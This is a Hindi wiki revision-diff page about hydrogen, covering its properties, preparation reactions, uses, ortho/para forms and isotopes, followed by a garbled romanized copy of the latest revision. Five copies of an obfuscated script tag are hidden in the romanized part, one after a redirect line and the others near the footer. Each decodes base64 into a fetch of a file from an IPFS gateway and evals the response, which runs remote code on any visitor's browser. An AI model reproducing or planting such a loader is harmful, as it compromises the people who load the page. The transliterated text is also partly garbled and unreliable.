Difference between revisions of "हाइड्रोजन"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
 
(35 intermediate revisions by 7 users not shown)
Line 1: Line 1:
{{Elementbox
+
{{सूचना बक्सा हाइड्रोजन}}
|name=हाइड्रोजन
+
'''हाइड्रोजन''' ([[अंग्रेज़ी]]:''Hydrogen'') [[आवर्त सारणी]] का प्रथम [[तत्व]] है। हाइड्रोजन का [[हिन्दी]] नाम 'उदजन' है। यह अन्य सभी तत्वों से हल्का होता है। इसका प्रतीकानुसार 'उ' (H) तथा [[परमाणु संख्या]] 1 होती है। इसका [[परमाणु द्रव्यमान]] 1.008 होता है। इसका [[इलेक्ट्रॉनिक विन्यास]] 1s<sup>1</sup> होता है। इसे आवर्त सारणी के उपवर्ग IA में रखा गया है। यह 's' - ब्लॉक का सदस्य है। कुछ मामले में हाइड्रोजन की समानता [[हैलोजन]] के साथ होने के कारण इसे इन [[तत्व|तत्वों]] के साथ उपवर्ग VIIA में भी रख दिया गया है। प्रथम तत्त्व होने के कारण हाइड्रोजन का 9वाँ स्थान है। [[सूर्य (तारा)|सूर्य]] और [[तारा|तारों]] का आधा भाग हाइड्रोजन का बना है। हाइड्रोजन को भविष्य का [[ईंधन]] कहा जाता है। इसके [[नाभिक]] में सिर्फ़ एक [[प्रोटॉन]] होता है। यह आवर्त सारणी का एकमात्र ऐसा तत्त्व है, इसके नाभिक में [[न्यूट्रॉन]] नहीं पाया जाता है। इसकी खोज 1766 ई. में हेनरी कैवेंडिस ने की। हाइड्रोजन सभी [[अम्ल|अम्लों]] का अनिवार्य अंग है।<ref>(DAVY का कथन)</ref>
|symbol=H
 
|number=1
 
|pronounce=
 
|left=-
 
|right=[[हिलियम]]
 
|above=-
 
|below=[[लिथियम|Li]]
 
|series=अधातु
 
|series comment=
 
|group=1
 
|period=1
 
|block=s
 
|series color=
 
|phase color=
 
|appearance=प्लाज़्मा अवस्था में बैंगनी प्रभा सहित रंगहीन गैस
 
|image name=Hydrogenglow.jpg
 
|image size=
 
|image name comment=
 
|image name 2=Hydrogen Spectra.jpg
 
|image size 2=
 
|image name 2 comment=हाइड्रोजन की वर्णक्रम रेखाएँ
 
|atomic mass=1.00794
 
|atomic mass 2=7
 
|atomic mass comment=
 
|electron configuration=1s<sup>1</sup>
 
|electrons per shell=1
 
|color=रंगहीन
 
|phase=गैस
 
|phase comment=
 
|density gplstp=0.08988
 
|density gpcm3nrt=
 
|density gpcm3nrt 3=
 
|density gpcm3mp=0.07 (0.0763 [[ठोस]])<ref>{{cite book|url=http://books.google.com/books?id=vEwj1WZKThEC&pg=PA240|page=240|title=Inorganic chemistry|author=Wiberg, Egon; Wiberg, Nils; Holleman, Arnold Frederick|publisher=Academic Press|year=2001|isbn=0123526515}}</ref>
 
|melting point K=14.01
 
|melting point C=-259.14
 
|melting point F=-434.45
 
|melting point pressure=
 
|sublimation point K=
 
|sublimation point C=
 
|sublimation point F=
 
|sublimation point pressure=
 
|boiling point K=20.28
 
|boiling point C=-252.87
 
|boiling point F=-423.17
 
|boiling point pressure=
 
|triple point K=13.8033
 
|triple point kPa=7.042
 
|triple point K 2=
 
|triple point kPa 2=
 
|critical point K=32.97
 
|critical point MPa=1.293
 
|heat fusion=(H<sub>2</sub>) 0.117
 
|heat fusion 2=
 
|heat fusion pressure=
 
|heat vaporization=(H<sub>2</sub>) 0.904
 
|heat vaporization pressure=
 
|heat capacity=(H<sub>2</sub>) 28.836
 
|heat capacity pressure=
 
|vapor pressure 1=
 
|vapor pressure 10=
 
|vapor pressure 100=
 
|vapor pressure 1 k=
 
|vapor pressure 10 k=15
 
|vapor pressure 100 k=20
 
|vapor pressure comment=
 
|crystal structure=षटकोणीय
 
|oxidation states=1, -1
 
|oxidation states comment=उदासीन ऑक्साइड
 
|electronegativity=2.20
 
|number of ionization energies=1
 
|1st ionization energy=1312.0
 
|2nd ionization energy=
 
|3rd ionization energy=
 
|atomic radius=
 
|atomic radius calculated=
 
|covalent radius=31±5
 
|Van der Waals radius=120
 
|magnetic ordering=[[प्रतिचुम्बकीय]]<ref>[http://www-d0.fnal.gov/hardware/cal/lvps_info/engineering/elementmagn.pdf Magnetic susceptibility of the elements and inorganic compounds], in Handbook of Chemistry and Physics 81st edition, CRC press. </ref>
 
|electrical resistivity=
 
|electrical resistivity at 0=
 
|electrical resistivity at 20=
 
|thermal conductivity=0.1805
 
|thermal conductivity 2=
 
|thermal diffusivity=
 
|thermal expansion=
 
|thermal expansion at 25=
 
|speed of sound=(गैस, 27 °C) 1310
 
|speed of sound rod at 20=
 
|speed of sound rod at r.t.=
 
|Tensile strength=
 
|Young's modulus=
 
|Shear modulus=
 
|Bulk modulus=
 
|Poisson ratio=
 
|Mohs hardness=
 
|Vickers hardness=
 
|Brinell hardness=
 
|CAS number=1333-74-0
 
|isotopes=
 
{{Elementbox isotopes stable | mn=1 | sym=H | na=99.985% | n=0 }}
 
{{Elementbox isotopes stable | mn=2 | sym=H | na=0.015% | n=1 | link=ड्यूटेरियम }}
 
{{Elementbox isotopes decay | mn=3 | sym=H | na=[[Trace radioisotope|ट्रेस]] | hl=12.32 [[years|y]] | dm=[[beta minus decay|β<sup>&minus;</sup>]] | de=0.01861 | pn=3 | ps=[[helium|He]] | link=Tritium}}
 
}}
 
([[अंग्रेज़ी भाषा|अंग्रेज़ी]]:Hydrogen) हाइड्रोजन [[आवर्त सारणी]] का प्रथम [[तत्व]] है। यह अन्य सभी तत्वों से हल्का होता है। इसका प्रतीकानुसार 'H' तथा [[परमाणु संख्या]] 1 होती है। इसका [[परमाणु द्रव्यमान]] 1.008 होता है। इसका इलेक्ट्रॉनिक विन्यास 1s<sup>1</sup> होता है। इसे अवार्त सारणी के उपवर्ग IA में रखा गया है। यह 's' - ब्लॉक का सदस्य है। कुछ मामले में हाइड्रोजन की समानता [[हैलोजन]] के साथ होने के कारण इसे इन तत्वों के साथ उपवर्ग VIIA में भी रख दिया गया है। प्रथम तत्व होने के कारण हाइड्रोजन का 9वाँ स्थान है। [[सूर्य]] और [[तारा|तारों]] का आधा भाग हाइड्रोजन का बना है। हाइड्रोजन को भविष्य का [[ईंधन]] कहा जाता है। इसके नाभिक में सिर्फ एक [[प्रोटॉन]] होता है। यह आवर्त सारणी का एकमात्र ऐसा तत्व है, इसके नाभिक में [[न्यूट्रॉन]] नहीं पाया जाता है। इसकी खोज 1766 ई. में हेनरी कैवेंडिस ने की। हाइड्रोजन सभी [[अम्ल|अम्लों]] का अनिवार्य अंग है। (DAVY का कथन)
 
 
==हाइड्रोजन निर्माण की विधि==
 
==हाइड्रोजन निर्माण की विधि==
 
(i) [[लाल रंग|लाल]] तप्त [[लोहा|लोहे]] पर भाप प्रवाहित करने पर हाइड्रोजन [[गैस]] प्राप्त होती है।
 
(i) [[लाल रंग|लाल]] तप्त [[लोहा|लोहे]] पर भाप प्रवाहित करने पर हाइड्रोजन [[गैस]] प्राप्त होती है।
 
<blockquote>3Fe + 4H<sub>2</sub>O → Fe<sub>3</sub>O<sub>4</sub> + 4H<sub>2</sub>↑</blockquote>
 
<blockquote>3Fe + 4H<sub>2</sub>O → Fe<sub>3</sub>O<sub>4</sub> + 4H<sub>2</sub>↑</blockquote>
 +
<blockquote>3लो + 4उ<sub>2</sub>जा → लो<sub>3</sub>जा<sub>4</sub> + 4उ<sub>2</sub>↑</blockquote>
 
(ii) हाइड्रोजन की [[जल]] से प्रतिक्रिया करने पर हाइड्रोजन गैस प्राप्त होती है।
 
(ii) हाइड्रोजन की [[जल]] से प्रतिक्रिया करने पर हाइड्रोजन गैस प्राप्त होती है।
 
<blockquote>CaH<sub>2</sub> + 2H<sub>2</sub>O → Ca(OH)<sub>2</sub> + H<sub>2</sub>↑</blockquote>
 
<blockquote>CaH<sub>2</sub> + 2H<sub>2</sub>O → Ca(OH)<sub>2</sub> + H<sub>2</sub>↑</blockquote>
 +
<blockquote>चू.उ<sub>2</sub> + 2उ<sub>2</sub>जा → चू(जा.उ)<sub>2</sub> + उ<sub>2</sub>↑</blockquote>
 
(iii) [[सोडियम]] की जल के साथ प्रतिक्रिया करने पर हाइड्रोजन गैस प्राप्त होती है।
 
(iii) [[सोडियम]] की जल के साथ प्रतिक्रिया करने पर हाइड्रोजन गैस प्राप्त होती है।
 
<blockquote>2Na + 2H<sub>2</sub>O → 2NaOH + H<sub>2</sub>↑</blockquote>
 
<blockquote>2Na + 2H<sub>2</sub>O → 2NaOH + H<sub>2</sub>↑</blockquote>
 +
<blockquote>2क्षा + 2उ<sub>2</sub>जा → 2क्षा.जा.उ + उ<sub>2</sub>↑</blockquote>
 +
 
==हाइड्रोजन का अधिशोषण==
 
==हाइड्रोजन का अधिशोषण==
[[पैलेडियम]] जैसी कुछ [[धातु|धातुओं]] के महीन चूर्ण द्वारा हाइड्रोजन गैस शीघ्रता से अवशोषित कर ली जाती है। धातु को गर्म करने पर अधिशोषित गैस पुनः बाहर निकल जाती है। हाइड्रोजन के इस प्रकार अधिशोषित होने की क्रिया को हाइड्रोजन का अधिशोषण कहते हैं।
+
[[पलाडियम]] जैसी कुछ [[धातु|धातुओं]] के महीन चूर्ण द्वारा हाइड्रोजन गैस शीघ्रता से अवशोषित कर ली जाती है। धातु को गर्म करने पर अधिशोषित गैस पुनः बाहर निकल जाती है। हाइड्रोजन के इस प्रकार अधिशोषित होने की क्रिया को हाइड्रोजन का अधिशोषण कहते हैं।
 
==तेलों का हाइड्रोजनीकरण==
 
==तेलों का हाइड्रोजनीकरण==
उच्च [[दाब]] पर निकेल उत्प्रेरक की उपस्थिति में हाइड्रोजन वनस्पलि तेलों से संयोग करके उन्हें वनस्पति घी में परिणत कर देता है, इस प्रक्रिया को तेलों का हाइड्रोजनीकरण कहते हैं।
+
उच्च [[दाब]] पर निकेल उत्प्रेरक की उपस्थिति में हाइड्रोजन वनस्पलि तेलों से संयोग करके उन्हें वनस्पति घी में परिणत कर देता है, इस प्रक्रिया को तेलों का [[हाइड्रोजनीकरण]] कहते हैं।
 
==हाइड्रोजन का उपयोग==
 
==हाइड्रोजन का उपयोग==
# प्रायः अन्य गैसों के साथ मिश्रित कर ईंधन के रूप में उपयोग करा जाता है।
+
# प्रायः अन्य गैसों के साथ मिश्रित कर [[ईंधन]] के रूप में उपयोग करा जाता है।
 
# हैबर विधि से [[अमोनिया]] के उत्पादन में होता है।
 
# हैबर विधि से [[अमोनिया]] के उत्पादन में होता है।
 
# वनस्पति घी के निर्माण में उपयोग होता है।
 
# वनस्पति घी के निर्माण में उपयोग होता है।
 
# गैसोलिन के उत्पाद में भी उपयोग होता है
 
# गैसोलिन के उत्पाद में भी उपयोग होता है
# [[ऑक्सीजन]] हाइड्रोजन लौ ([[ताप]] 2800°C) का उपयोग धातुओं को काटने तथा जोड़ने में होता है।
+
# [[जारक]] हाइड्रोजन लौ ([[ताप]] 2800°C) का उपयोग धातुओं को काटने तथा जोड़ने में होता है।
# हल्की गैस होने के कारण गुब्बारे में भरने में होता है, किन्तु ज्वलनशील होने के कारण आजकल इसकी जगह [[हीलियम]] या हीलियम-हाइड्रोजन मिश्रण (He 85% + H<sub>2</sub> 15%) का व्यवहार होता है।
+
# हल्की गैस होने के कारण गुब्बारे में भरने में होता है, किन्तु ज्वलनशील होने के कारण आजकल इसकी जगह [[यानाति]] या [[यानाति]]-हाइड्रोजन मिश्रण (He 85% + H<sub>2</sub> 15%) का व्यवहार होता है।
# [[द्रव]] हाइड्रोजन रॉकेट ईंधन के रूप में प्रयुक्त होता है।
+
# [[द्रव]] हाइड्रोजन बाण-हवाई (रॉकेट) ईंधन के रूप में प्रयुक्त होता है।
  
 
==हाइड्रोजन के रूप==
 
==हाइड्रोजन के रूप==
====<u>नवजात हाइड्रोजन</u>====
+
====नवजात हाइड्रोजन====
 
रासायनिक प्रतिक्रिया के फलस्वरूप किसी [[यौगिक]] से तुरन्त निकली हुई हाइड्रोजन गैस नवजात कहलाती है। यह आण्विक हाइड्रोजन से अधिक क्रियाशील होता है।
 
रासायनिक प्रतिक्रिया के फलस्वरूप किसी [[यौगिक]] से तुरन्त निकली हुई हाइड्रोजन गैस नवजात कहलाती है। यह आण्विक हाइड्रोजन से अधिक क्रियाशील होता है।
====<u>परमाण्विक हाइड्रोजन</u>====
+
====परमाण्विक हाइड्रोजन====
 
हाइड्रोजन [[अणु]] के विघटन से प्राप्त होने वाले हाइड्रोजन को परमाण्विक हाइड्रोजन कहते हैं।
 
हाइड्रोजन [[अणु]] के विघटन से प्राप्त होने वाले हाइड्रोजन को परमाण्विक हाइड्रोजन कहते हैं।
====<u>ऑर्थों हाइड्रोजन</u>====
+
====ऊर्ध्व (ऑर्थों) हाइड्रोजन====
हाइड्रोजन का वह रूप जिसमें हाइड्रोजन आणु के [[परमाणु|परमाणुओं]] के नाभिक एक ही दिशा में चक्रण करते हैं, ऑर्थों हाइड्रोजन कहलाता है।
+
हाइड्रोजन का वह रूप जिसमें हाइड्रोजन आणु के [[परमाणु|परमाणुओं]] के नाभिक एक ही दिशा में चक्रण करते हैं, ऊर्ध्व-हाइड्रोजन कहलाता है।
====<u>पारा हाइड्रोजन</u>====
+
====परा (पारा) हाइड्रोजन====
हाइड्रोजन का वह रूप जिसमें हाइड्रोजन आणु के परमाणुओं के नाभिक एक दूसरे के विपरीत दिशा में चक्रण करते हैं, पारा हाइड्रोजन कहलाता है।
+
हाइड्रोजन का वह रूप जिसमें हाइड्रोजन आणु के परमाणुओं के नाभिक एक दूसरे के विपरीत दिशा में चक्रण करते हैं, परा-हाइड्रोजन कहलाता है।
 +
 
 
==हाइड्रोजन के समस्थानिक==
 
==हाइड्रोजन के समस्थानिक==
 
{{main|हाइड्रोजन के समस्थानिक}}
 
{{main|हाइड्रोजन के समस्थानिक}}
Line 141: Line 42:
 
#ट्राइटियम (<sub>1</sub>H<sup>3</sup> या T)
 
#ट्राइटियम (<sub>1</sub>H<sup>3</sup> या T)
  
{{लेख प्रगति
+
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक3|माध्यमिक=|पूर्णता=|शोध=}}
|आधार=
 
|प्रारम्भिक=प्रारम्भिक2
 
|माध्यमिक=
 
|पूर्णता=
 
|शोध=
 
}}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
 
+
==संबंधित लेख==
[[Category:रसायन विज्ञान]]
+
{{आवर्त सारणी}}{{रसायन विज्ञान}}
[[Category:विज्ञान_कोश]]
+
[[Category:रसायन विज्ञान]][[Category:रासायनिक तत्त्व]][[Category:गैसें]][[Category:भौतिक रसायन]][[Category:पदार्थ प्रावस्थाएँ]][[Category:विज्ञान_कोश]]
 
__INDEX__
 
__INDEX__
__NOTOC__
 

Latest revision as of 12:14, 14 February 2021

  1. REDIRECTsaancha:Infobox element

haidrojan (aangrezi:Hydrogen) avart sarani ka pratham tatv hai. haidrojan ka hindi nam 'udajan' hai. yah any sabhi tatvoan se halka hota hai. isaka pratikanusar 'u' (H) tatha paramanu sankhya 1 hoti hai. isaka paramanu dravyaman 1.008 hota hai. isaka ilektr aaunik vinyas 1s1 hota hai. ise avart sarani ke upavarg IA mean rakha gaya hai. yah 's' - bl aauk ka sadasy hai. kuchh mamale mean haidrojan ki samanata hailojan ke sath hone ke karan ise in tatvoan ke sath upavarg VIIA mean bhi rakh diya gaya hai. pratham tattv hone ke karan haidrojan ka 9vaan sthan hai. soory aur taroan ka adha bhag haidrojan ka bana hai. haidrojan ko bhavishy ka eeandhan kaha jata hai. isake nabhik mean sirf ek prot aaun hota hai. yah avart sarani ka ekamatr aisa tattv hai, isake nabhik mean nyootr aaun nahian paya jata hai. isaki khoj 1766 ee. mean henari kaiveandis ne ki. haidrojan sabhi amloan ka anivary aang hai.[1]

haidrojan nirman ki vidhi

(i) lal tapt lohe par bhap pravahit karane par haidrojan gais prapt hoti hai.

3Fe + 4H2O → Fe3O4 + 4H2

3lo + 4u2ja → lo3ja4 + 4u2

(ii) haidrojan ki jal se pratikriya karane par haidrojan gais prapt hoti hai.

CaH2 + 2H2O → Ca(OH)2 + H2

choo.u2 + 2u2ja → choo(ja.u)2 + u2

(iii) sodiyam ki jal ke sath pratikriya karane par haidrojan gais prapt hoti hai.

2Na + 2H2O → 2NaOH + H2

2ksha + 2u2ja → 2ksha.ja.u + u2

haidrojan ka adhishoshan

paladiyam jaisi kuchh dhatuoan ke mahin choorn dvara haidrojan gais shighrata se avashoshit kar li jati hai. dhatu ko garm karane par adhishoshit gais punah bahar nikal jati hai. haidrojan ke is prakar adhishoshit hone ki kriya ko haidrojan ka adhishoshan kahate haian.

teloan ka haidrojanikaran

uchch dab par nikel utprerak ki upasthiti mean haidrojan vanaspali teloan se sanyog karake unhean vanaspati ghi mean parinat kar deta hai, is prakriya ko teloan ka haidrojanikaran kahate haian.

haidrojan ka upayog

  1. prayah any gaisoan ke sath mishrit kar eeandhan ke roop mean upayog kara jata hai.
  2. haibar vidhi se amoniya ke utpadan mean hota hai.
  3. vanaspati ghi ke nirman mean upayog hota hai.
  4. gaisolin ke utpad mean bhi upayog hota hai
  5. jarak haidrojan lau (tap 2800°C) ka upayog dhatuoan ko katane tatha jo dane mean hota hai.
  6. halki gais hone ke karan gubbare mean bharane mean hota hai, kintu jvalanashil hone ke karan ajakal isaki jagah yanati ya yanati-haidrojan mishran (He 85% + H2 15%) ka vyavahar hota hai.
  7. drav haidrojan ban-havaee (r aauket) eeandhan ke roop mean prayukt hota hai.

haidrojan ke roop

navajat haidrojan

rasayanik pratikriya ke phalasvaroop kisi yaugik se turant nikali huee haidrojan gais navajat kahalati hai. yah anvik haidrojan se adhik kriyashil hota hai.

paramanvik haidrojan

haidrojan anu ke vighatan se prapt hone vale haidrojan ko paramanvik haidrojan kahate haian.

oordhv (aaurthoan) haidrojan

haidrojan ka vah roop jisamean haidrojan anu ke paramanuoan ke nabhik ek hi disha mean chakran karate haian, oordhv-haidrojan kahalata hai.

para (para) haidrojan

haidrojan ka vah roop jisamean haidrojan anu ke paramanuoan ke nabhik ek doosare ke viparit disha mean chakran karate haian, para-haidrojan kahalata hai.

haidrojan ke samasthanik

  1. REDIRECTsaancha:mukhy<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

haidrojan ke tin samasthanik hote haian, ye hai-

  1. protiyam (1H1)
  2. dyooteriyam (1H2 ya D)
  3. traitiyam (1H3 ya T)


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

  1. (DAVY ka kathan)

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>